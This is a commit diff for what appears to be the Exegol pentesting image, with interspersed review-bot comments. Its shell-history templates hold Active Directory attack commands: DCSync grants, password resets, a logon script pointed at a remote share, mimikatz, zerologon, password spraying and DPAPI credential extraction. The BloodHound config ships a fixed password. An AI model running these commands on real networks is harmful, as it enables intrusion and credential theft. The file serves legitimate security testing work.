Merge pull request #331 from ThePorgs/dev
Release 3.1.3
ShutdownRepo authored Apr 14, 2024
2 parents ef1bc9c + 9060fa5 commit a7c25d3
Showing 59 changed files with 767 additions and 343 deletions.
2 changes: 1 addition & 1 deletion .github/workflows/entrypoint_preprod_ad.yml
Expand Up @@ -43,7 +43,7 @@ jobs:
image_exists: ${{ steps.check_remote_image.outputs.image_exists }}
steps:
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
- name: Setting variables
id: varset
run: |
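Review bot: `uses: actions/checkout@main` replaces a version tag with a branch ref, so every run executes whatever the action's default branch holds at that moment; pinning to a full commit SHA with the version in a trailing comment, e.g. `uses: actions/checkout@<full-commit-sha>  # <version>` (placeholders, not real values), keeps the workflow reproducible and reviewable. The same change is made in entrypoint_preprod_base.yml (twice), entrypoint_preprod_full.yml, _light, _osint, _web, sub_code_check.yml, sub_export_tools.yml and sub_build.yml, where `docker/build-push-action@master` is introduced as well. It matters most in the entrypoint_preprod_base.yml job whose env carries `GITHUB_TOKEN: ${{ secrets.GH_PAT_BASE_TRIGGER }}`, because steps in that job run with a personal access token in their environment. The job bodies continue outside the hunks shown.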
4 changes: 2 additions & 2 deletions .github/workflows/entrypoint_preprod_base.yml
Expand Up @@ -35,7 +35,7 @@ jobs:
image_exists: ${{ steps.check_remote_image.outputs.image_exists }}
steps:
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
with:
fetch-depth: 2
- name: Setting variables
Expand Down Expand Up @@ -207,7 +207,7 @@ jobs:
GITHUB_TOKEN: ${{ secrets.GH_PAT_BASE_TRIGGER }}
steps:
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
- name: List labels
run: gh pr view --json labels ${{ github.event.number }} -q '.labels[].name'
- name: Label "base success" already set?
2 changes: 1 addition & 1 deletion .github/workflows/entrypoint_preprod_full.yml
Expand Up @@ -43,7 +43,7 @@ jobs:
image_exists: ${{ steps.check_remote_image.outputs.image_exists }}
steps:
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
- name: Setting variables
id: varset
run: |
2 changes: 1 addition & 1 deletion .github/workflows/entrypoint_preprod_light.yml
Expand Up @@ -43,7 +43,7 @@ jobs:
image_exists: ${{ steps.check_remote_image.outputs.image_exists }}
steps:
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
- name: Setting variables
id: varset
run: |
2 changes: 1 addition & 1 deletion .github/workflows/entrypoint_preprod_osint.yml
Expand Up @@ -43,7 +43,7 @@ jobs:
image_exists: ${{ steps.check_remote_image.outputs.image_exists }}
steps:
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
- name: Setting variables
id: varset
run: |
2 changes: 1 addition & 1 deletion .github/workflows/entrypoint_preprod_web.yml
Expand Up @@ -43,7 +43,7 @@ jobs:
image_exists: ${{ steps.check_remote_image.outputs.image_exists }}
steps:
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
- name: Setting variables
id: varset
run: |
4 changes: 2 additions & 2 deletions .github/workflows/sub_build.yml
Expand Up @@ -42,14 +42,14 @@ jobs:
docker image ls -a
docker ps
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
- name: Prepare build
# Preparing variables used for tagging the image to build
id: prepare
run: echo "BUILD_DATE=$(date -u +"%Y-%m-%dT%H:%M:%SZ")" >> $GITHUB_OUTPUT
- name: Build the image
if: success()
uses: docker/build-push-action@v4
uses: docker/build-push-action@master
with:
load: true
no-cache: true
4 changes: 2 additions & 2 deletions .github/workflows/sub_code_check.yml
Expand Up @@ -12,14 +12,14 @@ jobs:
checked_function: [ "colorecho", "add-aliases", "add-history", "add-test-command", "add-to-list" ]
steps:
- name: Checkout
uses: actions/checkout@v3
uses: actions/checkout@main
- name: Check ${{ matrix.checked_function }}
run: python3 sources/code_compliance_check.py ${{ matrix.checked_function }}
shellcheck:
name: Shell check
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- uses: actions/checkout@main
- name: Run ShellCheck
uses: ludeeus/action-shellcheck@master
env:
4 changes: 2 additions & 2 deletions .github/workflows/sub_export_tools.yml
Expand Up @@ -35,9 +35,9 @@ jobs:
- ${{ inputs.ARCH }}
steps:
- name: Checkout Exegol-images
uses: actions/checkout@v3
uses: actions/checkout@main
- name: Checkout Exegol-docs
uses: actions/checkout@v3
uses: actions/checkout@main
with:
repository: 'ThePorgs/Exegol-docs'
ref: ${{ inputs.DOCS_TARGET_BRANCH }}
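--- a/sources/assets/bloodhound-ce/bloodhound.config.json
+++ b/sources/assets/bloodhound-ce/bloodhound.config.json
@@ -0,0 +1,23 @@
+{
+"version": 1,
+"bind_addr": "localhost:1030",
+"metrics_port": ":2112",
+"root_url": "http://localhost:1030/",
+"work_dir": "/opt/tools/BloodHound-CE/work",
+"log_level": "INFO",
+"log_path": "bloodhound.log",
+"features": {
+"enable_auth": true
+},
+"tls": {
+"cert_file": "",
+"key_file": ""
+},
+"database": {
+"connection": "user=bloodhound password=exegol4thewin dbname=bloodhound host=localhost"
+},
+"neo4j": {
+"connection": "neo4j://neo4j:exegol4thewin@localhost:7687/"
+},
+"collectors_base_path": "/opt/tools/BloodHound-CE/collectors"
+}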
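Review bot: The `database` and `neo4j` connection strings commit a fixed password (`exegol4thewin`) that is then identical in every image built from this file, so anyone who can reach the PostgreSQL or Neo4j listener of a container can log in. `bind_addr` keeps the web UI on `localhost:1030`, but `"metrics_port": ":2112"` has no host part and presumably listens on all interfaces; if the setting accepts a host, `"metrics_port": "127.0.0.1:2112"` would match the UI. Because JSON cannot carry a comment, the install step or the documentation should state that both database services must stay bound to loopback, or the password should be generated at first start instead of shipped.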
267 changes: 158 additions & 109 deletions sources/assets/bloodhound/customqueries.json

Large diffs are not rendered by default.

9 changes: 7 additions & 2 deletions sources/assets/exegol/load_supported_setups.sh
Expand Up @@ -62,8 +62,13 @@ function deploy_zsh() {
function deploy_tmux() {
colorecho "Deploying tmux"
if [[ -d "$MY_SETUP_PATH/tmux" ]]; then
# copy tmux/tmux.conf to ~/.tmux.conf
[[ -f "$MY_SETUP_PATH/tmux/tmux.conf" ]] && cp "$MY_SETUP_PATH/tmux/tmux.conf" ~/.tmux.conf
# id define, copy tmux/tmux.conf to ~/.tmux.conf
if [[ -f "$MY_SETUP_PATH/tmux/tmux.conf" ]]; then
# This key must always be defined (if redefined later in the file, the user user will take precedence)
echo 'set-option -g default-shell /bin/zsh' > ~/.tmux.conf
# Adding custom user config
cat "$MY_SETUP_PATH/tmux/tmux.conf" >> ~/.tmux.conf
fi
else
mkdir "$MY_SETUP_PATH/tmux" && chmod 770 "$MY_SETUP_PATH/tmux"
fi
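Review bot: The two comments added in deploy_tmux contain typos that hide the intent: `# id define, copy tmux/tmux.conf to ~/.tmux.conf` presumably means `# If defined, copy tmux/tmux.conf to ~/.tmux.conf`, and "the user user will take precedence" should read "the user's value will take precedence". The second comment also says the key "must always be defined", yet `echo 'set-option -g default-shell /bin/zsh' > ~/.tmux.conf` runs only inside `if [[ -f "$MY_SETUP_PATH/tmux/tmux.conf" ]]`, so when no user file exists this function does not write the default; whether it is set elsewhere is not visible here. The function's closing brace lies outside the hunk.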
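--- a/sources/assets/patches/openssl.patch
+++ b/sources/assets/patches/openssl.patch
@@ -0,0 +1,12 @@
+[exegol_provider]
+default = default_sect
+legacy = legacy_sect
+
+[openssl_init]
+providers = exegol_provider
+
+[default_sect]
+activate = 1
+
+[legacy_sect]
+activate = 1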
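Review bot: `[legacy_sect]` with `activate = 1` turns on OpenSSL's legacy provider for every process that reads this configuration, which re-enables algorithms such as MD4 and RC4 image-wide, and the file gives no reason for it. A header comment would record the intent, for example `# Legacy provider enabled on purpose: some bundled tools need MD4/RC4 (assumed, confirm)`. How this fragment is merged into the system openssl.cnf, and whether `openssl_conf = openssl_init` is already set there, is not visible in this commit.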
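--- a/sources/assets/python/requirements.txt
+++ b/sources/assets/python/requirements.txt
@@ -0,0 +1,36 @@
+# most common dependencies, found with the following commands
+# 1. for pipx:
+# find ~/.local/share/pipx/ -type d -name "bin" 2>/dev/null | while read venv_path; do venv_bin="${venv_path}/python"; if [[ -x "$venv_bin" ]]; then suffix=$(printf "%04d" $((suffix+1))); "$venv_bin" -m pip list > "/tmp/pipxlibs${suffix}.txt"; fi; done
+# 2. for /opt/tools:
+# find /opt/tools ~/.local/share/pipx/ -type d -name "venv" 2>/dev/null | while read venv_path; do venv_bin="${venv_path}/bin/python"; if [[ -x "$venv_bin" ]]; then suffix=$(printf "%04d" $((suffix+1))); "$venv_bin" -m pip list > "/tmp/piplibs${suffix}.txt"; fi; done
+# 3. compare
+# awk 'FNR > 2 {print $1}' /tmp/piplibs*.txt /tmp/pipxlibs*.txt | sort | uniq -c | sort -nr
+
+# The impacket package cannot be added here as it will conflict with install_impacket
+
+setuptools
+pip
+charset-normalizer
+six
+certifi
+idna
+urllib3
+requests
+pycparser
+cffi
+click
+cryptography
+MarkupSafe
+Jinja2
+pyasn1
+dnspython
+Werkzeug
+pyOpenSSL
+itsdangerous
+Flask
+pycryptodomex
+ldap3
+blinker
+future
+ldapdomaindump
+pandas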
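Review bot: None of the packages listed carries a version or a hash, so each image build resolves to whatever is newest on the index at that moment, and a hijacked or broken release of any of them lands in the image unreviewed. Pinning each entry (`requests==<version>`, placeholder) and, where the install step allows it, installing with `pip install --require-hashes` would make builds reproducible and auditable. Listing `pip` and `setuptools` here also means the installer can upgrade itself during the same run; whether that is intended is not visible from this file.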
1 change: 1 addition & 0 deletions sources/assets/shells/aliases.d/_init
Expand Up @@ -8,3 +8,4 @@ alias urldecode='python -c "import sys, urllib as ul; print ul.unquote_plus(sys.
alias sed-empty-line='sed /^$/d'
alias http-put-server='python3 /opt/resources/linux/http-put-server.py --bind 0.0.0.0'
alias ws='cd /workspace'
alias systemctl="echo 'Systemctl cannot be used inside the container. Please use the \"service\" command instead.' && false"
2 changes: 1 addition & 1 deletion sources/assets/shells/aliases.d/burpsuite
@@ -1,2 +1,2 @@
alias BurpSuiteCommunity='java -jar -Xmx4g /opt/tools/BurpSuiteCommunity/BurpSuiteCommunity.jar'
alias BurpSuiteCommunity='/usr/lib/jvm/java-21-openjdk/bin/java -jar -Xmx4g /opt/tools/BurpSuiteCommunity/BurpSuiteCommunity.jar'
alias burpsuite=BurpSuiteCommunity
2 changes: 1 addition & 1 deletion sources/assets/shells/aliases.d/evil-winrm
@@ -1 +1 @@
alias evil-winrm='/usr/local/rvm/gems/ruby-3.2.2@evil-winrm/wrappers/ruby /usr/local/rvm/gems/ruby-3.2.2@evil-winrm/bin/evil-winrm'
alias evil-winrm='/usr/local/rvm/gems/ruby-3.1.2@evil-winrm/wrappers/ruby /usr/local/rvm/gems/ruby-3.1.2@evil-winrm/bin/evil-winrm'
2 changes: 1 addition & 1 deletion sources/assets/shells/aliases.d/extractbitlockerkeys
@@ -1 +1 @@
alias ExtractBitlockerKeys.py="/opt/tools/ExtractBitlockerKeys/venv/bin/python3 /opt/tools/ExtractBitlockerKeys/ExtractBitlockerKeys.py"
alias ExtractBitlockerKeys.py="/opt/tools/ExtractBitlockerKeys/venv/bin/python3 /opt/tools/ExtractBitlockerKeys/python/ExtractBitlockerKeys.py"
5 changes: 4 additions & 1 deletion sources/assets/shells/aliases.d/metasploit
@@ -1,6 +1,9 @@
alias msfconsole='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfconsole'
alias msfd='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfd'
alias msfdb='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfdb'
msfdb_func() {
sudo -u postgres sh -c "cd /opt/tools/metasploit-framework && /usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/bundle exec /opt/tools/metasploit-framework/msfdb $@"
}
alias msfdb='msfdb_func'
alias msfrpc='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfrpc'
alias msfrpcd='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfrpcd'
alias msfupdate='/usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/ruby /opt/tools/metasploit-framework/msfupdate'
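Review bot: In `msfdb_func`, `$@` sits inside the double-quoted `sh -c "..."` string, where it still splits into separate words in bash and zsh, so with two or more arguments only the first ends up in the command string and the rest become `$0`, `$1`, … of the inner shell and are silently dropped. A single argument containing spaces or shell metacharacters is also re-parsed by the `sh` that runs as `postgres`. Passing the arguments as positional parameters avoids both: `sudo -u postgres sh -c 'cd /opt/tools/metasploit-framework && /usr/local/rvm/gems/ruby-3.2.2@metasploit/wrappers/bundle exec /opt/tools/metasploit-framework/msfdb "$@"' msfdb "$@"`.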
1 change: 1 addition & 0 deletions sources/assets/shells/aliases.d/responder
Expand Up @@ -5,3 +5,4 @@ alias responder-http-on="sed -i 's/HTTP = Off/HTTP = On/g' /opt/tools/Responder/
alias responder-http-off="sed -i 's/HTTP = On/HTTP = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='"
alias responder-smb-on="sed -i 's/SMB = Off/SMB = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='"
alias responder-smb-off="sed -i 's/SMB = On/SMB = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='"
alias responder="Responder.py"
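--- a/sources/assets/shells/aliases.d/sccmhunter
+++ b/sources/assets/shells/aliases.d/sccmhunter
@@ -0,0 +1 @@
+alias sccmhunter.py='/opt/tools/sccmhunter/venv/bin/python3 /opt/tools/sccmhunter/sccmhunter.py'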
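--- a/sources/assets/shells/aliases.d/sccmwtf
+++ b/sources/assets/shells/aliases.d/sccmwtf
@@ -0,0 +1 @@
+alias sccmwtf.py='/opt/tools/sccmwtf/venv/bin/python3 /opt/tools/sccmwtf/sccmwtf.py'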
2 changes: 1 addition & 1 deletion sources/assets/shells/aliases.d/ysoserial
@@ -1 +1 @@
alias ysoserial='JAVA_HOME=/usr/lib/jvm/java-11-openjdk java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens=java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED -jar /opt/tools/ysoserial/ysoserial.jar'
alias ysoserial='/usr/lib/jvm/java-11-openjdk/bin/java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens=java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED -jar /opt/tools/ysoserial/ysoserial.jar'
2 changes: 1 addition & 1 deletion sources/assets/shells/history.d/abuseACL
@@ -1,4 +1,4 @@
abuseACL "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET"
abuseACL -hashes "$USER_NTHASH" -extends "$DOMAIN"/"$USER"
abuseACL -hashes "$NT_HASH" -extends "$DOMAIN"/"$USER"
abuseACL -k -principal "$PRINCIPAL" -extends "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET"
abuseACL -principalsfile ./principalsfile "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET"
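--- a/sources/assets/shells/history.d/bloodyAD
+++ b/sources/assets/shells/history.d/bloodyAD
@@ -0,0 +1,16 @@
+bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP set object $COMPUTER_NAME serviceprincipalname
+bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP set object $COMPUTER_NAME dnsHostName -v '$DC_NAME.$DOMAIN'
+bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP get object $COMPUTER_NAME --attr dnsHostName,serviceprincipalname
+bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object vulnerable_user msTSInitialProgram -v '\\1.2.3.4\share\file.exe'
+bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object vulnerable_user msTSWorkDirectory -v 'C:\'
+bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object vulnerable_user scriptPath -v '\\1.2.3.4\share\file.exe'
+bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set owner $TargetObject $ControlledPrincipal
+bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get dnsDump
+bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add groupMember $TargetGroup $TargetUser
+bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object 'RODC-server$' --attr msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local' -v 'CN=Administrator,CN=Users,DC=domain,DC=local'
+bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object 'RODC-server$' --attr msDS-NeverRevealGroup
+bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
+bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password $TargetUser $NewPassword
+bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add genericAll $TargetObject $ControlledPrincipal
+bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add dcsync $ControlledPrincipal
+bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get object $TargetObject --attr msDS-ManagedPassword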
2 changes: 1 addition & 1 deletion sources/assets/shells/history.d/certipy
@@ -1,4 +1,4 @@
certipy find -enabled -u "$USER@$DOMAIN" -p "$PASSWORD" -old-bloodhound
certipy req -username "$USER@$DOMAIN" -p "$PASSWORD" -ca "$CA_NAME" -target "$CA_FQDN" -template "$ESC1_TEMPLATE_NAME" -upn "Administrator@$DOMAIN"
certipy req -username "$USER@$DOMAIN" -hashes "$USER_NTHASH" -ca "$CA_NAME" -target "$CA_FQDN" -template "$ESC1_TEMPLATE_NAME" -upn "Administrator@$DOMAIN"
certipy req -username "$USER@$DOMAIN" -hashes "$NT_HASH" -ca "$CA_NAME" -target "$CA_FQDN" -template "$ESC1_TEMPLATE_NAME" -upn "Administrator@$DOMAIN"
certipy relay -ca "$CA_FQDN" -template "$ESC8_TEMPLATE_NAME"
21 changes: 21 additions & 0 deletions sources/assets/shells/history.d/crackmapexec
@@ -1,3 +1,24 @@
crackmapexec smb --list-modules
crackmapexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -M maq
crackmapexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD"
crackmapexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --asreproast ASREProastables.txt --kdcHost "$DC_HOST"
crackmapexec ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --kerberoasting Kerberoastables.txt --kdcHost "$DC_HOST"
crackmapexec smb "$TARGET" --continue-on-success --no-bruteforce -u users.txt -p passwords.txt
crackmapexec smb "$TARGET" --continue-on-success -u users.txt -p passwords.txt
crackmapexec smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M enum_avproducts
crackmapexec smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M mimikatz
crackmapexec smb "$TARGET" -u '' -p '' --pass-pol
crackmapexec smb 192.168.56.0/24 --gen-relay-list smb_targets.txt
crackmapexec smb 192.168.56.0/24 --local-auth -u '' -p ''
crackmapexec smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --loggedon-users
crackmapexec smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --sessions
crackmapexec smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --shares
crackmapexec smb 192.168.56.0/24 -u '' -p '' --shares
crackmapexec smb "$IP" -u "$USER" -p "$PASSWORD" -M noPac
crackmapexec smb "$IP" -u "$USER" -p "$PASSWORD" -M petitpotam
crackmapexec smb "$IP" -u '' -p '' -M zerologon
crackmapexec smb "$IP" -u '' -p '' -M ms17-010
crackmapexec smb "$IP" -u '' -p '' -M ioxidresolver
cme smb --list-modules
cme ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -M maq
cme ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD"
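--- a/sources/assets/shells/history.d/dploot
+++ b/sources/assets/shells/history.d/dploot
@@ -0,0 +1,24 @@
+dploot machinecertificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -quiet
+dploot backupkey -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -quiet
+dploot certificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk -quiet
+dploot browser -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile /data/masterkeys
+dploot masterkeys -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk
+dploot masterkeys -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -passwords passwords
+dploot credentials -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf
+dploot credentials -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk
+dploot vaults -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf
+dploot vaults -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk
+dploot rdg -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf
+dploot rdg -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk
+dploot certificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf
+dploot certificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk
+dploot browser -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf
+dploot browser -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk
+dploot machinemasterkeys -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP"
+dploot machinecredentials -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP"
+dploot machinevaults -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP"
+dploot machinecertificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP"
+dploot wifi -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP"
+dploot sccm -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP"
+dploot backupkey -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP"
+dploot mobaxterm -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk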
8 changes: 5 additions & 3 deletions sources/assets/shells/history.d/kerbrute
@@ -1,3 +1,5 @@
kerbrute userenum -d "$DOMAIN" usernames.txt
kerbrute passwordspray -d "$DOMAIN" domain_users.txt Password123
kerbrute bruteuser -d "$DOMAIN" passwords.lst thoffman
kerbrute userenum --domain "$DOMAIN" usernames.txt
kerbrute passwordspray --domain "$DOMAIN" domain_users.txt Password123
kerbrute passwordspray --user-as-pass --domain "$DOMAIN" domain_users.txt
kerbrute bruteuser --domain "$DOMAIN" passwords.lst thoffman
kerbrute bruteforce --domain "$DOMAIN" user_password.lst
22 changes: 22 additions & 0 deletions sources/assets/shells/history.d/netexec
Expand Up @@ -19,3 +19,25 @@ netexec smb "$IP" -u "$USER" -p "$PASSWORD" -M petitpotam
netexec smb "$IP" -u '' -p '' -M zerologon
netexec smb "$IP" -u '' -p '' -M ms17-010
netexec smb "$IP" -u '' -p '' -M ioxidresolver
netexec smb --list-modules
nxc ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -M maq
nxc ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD"
nxc ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --asreproast ASREProastables.txt --kdcHost "$DC_HOST"
nxc ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --kerberoasting Kerberoastables.txt --kdcHost "$DC_HOST"
nxc smb "$TARGET" --continue-on-success --no-bruteforce -u users.txt -p passwords.txt
nxc smb "$TARGET" --continue-on-success -u users.txt -p passwords.txt
nxc smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M enum_avproducts
nxc smb "$TARGET" --local-auth -u "$USER" -H "$NT_HASH" -M mimikatz
nxc smb "$TARGET" -u '' -p '' --pass-pol
nxc smb 192.168.56.0/24 --gen-relay-list smb_targets.txt
nxc smb 192.168.56.0/24 --local-auth -u '' -p ''
nxc smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --loggedon-users
nxc smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --sessions
nxc smb 192.168.56.0/24 -u "$USER" -p "$PASSWORD" --shares
nxc smb 192.168.56.0/24 -u '' -p '' --shares
nxc smb "$IP" -u "$USER" -p "$PASSWORD" -M noPac
nxc smb "$IP" -u "$USER" -p "$PASSWORD" -M petitpotam
nxc smb "$IP" -u '' -p '' -M zerologon
nxc smb "$IP" -u '' -p '' -M ms17-010
nxc smb "$IP" -u '' -p '' -M ioxidresolver

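--- a/sources/assets/shells/history.d/pretender
+++ b/sources/assets/shells/history.d/pretender
@@ -0,0 +1,5 @@
+pretender -i "$INTERFACE" --dry
+pretender -i "$INTERFACE" --dry --no-ra
+pretender -i "$INTERFACE" --dry --no-ra-dns
+pretender -i "$INTERFACE" --spoof "$DOMAIN"
+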
4 changes: 4 additions & 0 deletions sources/assets/shells/history.d/responder
Expand Up @@ -2,6 +2,10 @@ Responder.py --interface "$INTERFACE" --analyze --lm --disable-ess
Responder.py --interface "$INTERFACE" --analyze --disable-ess
Responder.py --interface "$INTERFACE" --wpad --lm --ProxyAuth --disable-ess
Responder.py --interface "$INTERFACE" --wpad --lm --disable-ess
responder --interface "$INTERFACE" --analyze --lm --disable-ess
responder --interface "$INTERFACE" --analyze --disable-ess
responder --interface "$INTERFACE" --wpad --lm --ProxyAuth --disable-ess
responder --interface "$INTERFACE" --wpad --lm --disable-ess
responder-http-off
responder-http-on
responder-smb-off
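--- a/sources/assets/shells/history.d/sccmhunter
+++ b/sources/assets/shells/history.d/sccmhunter
@@ -0,0 +1,10 @@
+sccmhunter.py admin -u "$USER" -p "$PASSWORD" -ip "$TARGET"
+sccmhunter.py find -u "$USER" -p "$PASSWORD" -d "$DOMAIN" -dc-ip "$DC_IP"
+sccmhunter.py smb -u "$USER" -p "$PASSWORD" -d "$DOMAIN" -dc-ip "$DC_IP" -save
+sccmhunter.py http -u "$USER" -p "$PASSWORD" -d "$DOMAIN" -dc-ip "$DC_IP" -auto
+sccmhunter.py http -u "$USER" -p "$PASSWORD" -d "$DOMAIN" -cn "$COMPUTER_NAME" -cp "$COMPUTER_PASSWORD" -dc-ip "$DC_IP"
+sccmhunter.py admin -u "$USERNAME" -p ":$NT_HASH" -ip "$TARGET"
+sccmhunter.py show -smb
+sccmhunter.py show -user
+sccmhunter.py show -computers
+sccmhunter.py show -all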
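--- a/sources/assets/shells/history.d/sccmwtf
+++ b/sources/assets/shells/history.d/sccmwtf
@@ -0,0 +1 @@
+sccmwtf.py fakepc "fakepc.$DOMAIN" "$SCCM_MP_NetBiosName" "$DOMAIN\controlledComputer$" "controlledPassword"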
